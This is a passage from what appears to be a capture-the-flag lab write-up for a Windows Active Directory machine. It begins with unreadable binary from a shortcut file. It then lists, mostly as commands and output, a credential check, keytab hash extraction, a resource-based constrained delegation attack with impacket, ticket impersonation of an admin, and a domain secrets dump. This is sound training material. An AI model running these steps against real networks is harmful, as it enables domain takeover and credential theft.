        ��c^���NI��e�2��▒�`�Xmucdc>i�Y
                                      �M�A���ϻg~�:N��
                                                     )BtP>i�Y
                                                             �M�A���ϻg~�:N��
                                                                            )BtPM       �a1SPS�0��C�G����sf"EdPuTTY (C:\Program Files)�1SPS��XF�L8C���&�m�q0S-1-5-21-1568358163-2901064146-3316491674-24588�1SPS0�%��G▒��`����%

putty.exe@ف+B��
                �) 

Credentialss are valid

1
2
3
4
└─$ nxc smb 10.10.245.117 -u adm_prju -p '<REDACTED>'

SMB         10.10.245.117   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
SMB         10.10.245.117   445    MUCDC            [+] heron.vl\adm_prju:<REDACTED>

adm_prju has WriteAccountRestrictions privileges over MUCDC, which means that we have ability to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property making it possible to perform RBCD attack. Usually, we create fake computer, but quota is 0.

1
2
3
4
5
6
└─$ nxc ldap 10.10.245.117 -u adm_prju -p '<REDACTED>' -M maq

LDAP        10.10.245.117   389    MUCDC            [*] Windows Server 2022 Build 20348 (name:MUCDC) (domain:heron.vl)
LDAP        10.10.245.117   389    MUCDC            [+] heron.vl\adm_prju:<REDACTED> 
MAQ         10.10.245.117   389    MUCDC            [*] Getting the MachineAccountQuota
MAQ         10.10.245.117   389    MUCDC            MachineAccountQuota: 0

Luckily, we have root privileges over frajmp host. We can retrieve it’s hash from /etc/krb5.keytab and extract it

1
└─$ sshpass -p 'Heron123!' scp pentest@10.10.245.118:/tmp/krb5.keytab .
1
2
3
4
5
6
7
8
9
10
└─$ ~/tools/red-team/KeyTabExtract/keytabextract.py krb5.keytab                                                                             
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : HERON.VL
        SERVICE PRINCIPAL : FRAJMP$/
        NTLM HASH : <REDACTED>
        AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
        AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd

Now we can start attack. We can do it manually, but we also have impacket’s rbcd.py solution to do it automatically.

Modify msDS-AllowedToActOnBehalfOfOtherIdentity to point to frajmp$

1
2
3
4
5
6
7
8
9
└─$ rbcd.py -delegate-from 'frajmp$' -delegate-to 'mucdc$' -dc-ip 10.10.245.117 -action 'write' 'heron.vl/adm_prju:<REDACTED>'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] frajmp$ can now impersonate users on mucdc$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FRAJMP$      (S-1-5-21-1568358163-2901064146-3316491674-27101)

Check attribute

1
2
3
4
5
6
└─$ rbcd.py -delegate-to 'mucdc$' -dc-ip 10.10.245.117 -action 'read' 'heron.vl/adm_prju:<REDACTED>'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Accounts allowed to act on behalf of other identity:
[*]     FRAJMP$      (S-1-5-21-1568358163-2901064146-3316491674-27101)

Get ticket

1
2
3
4
5
6
7
8
9
└─$ getST.py -dc-ip 10.10.245.117 -spn cifs/mucdc.heron.vl 'heron.vl/frajmp$' -impersonate _admin -hashes :<REDACTED>
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating _admin
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in _admin@cifs_mucdc.heron.vl@HERON.VL.ccache

Dump domain

1
2
3
4
5
└─$ KRB5CCNAME=_admin@cifs_mucdc.heron.vl@HERON.VL.ccache secretsdump.py -k -no-pass mucdc.heron.vl          
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
<SNIP>
[*] Dumping cached domain logon information (domain/username:hash)
<SNIP>

https://api.vulnlab.com/api/v1/share?id=46819fa3-d4ab-4f78-bbdc-e236a282a9be

This post is licensed under CC BY 4.0 by the author.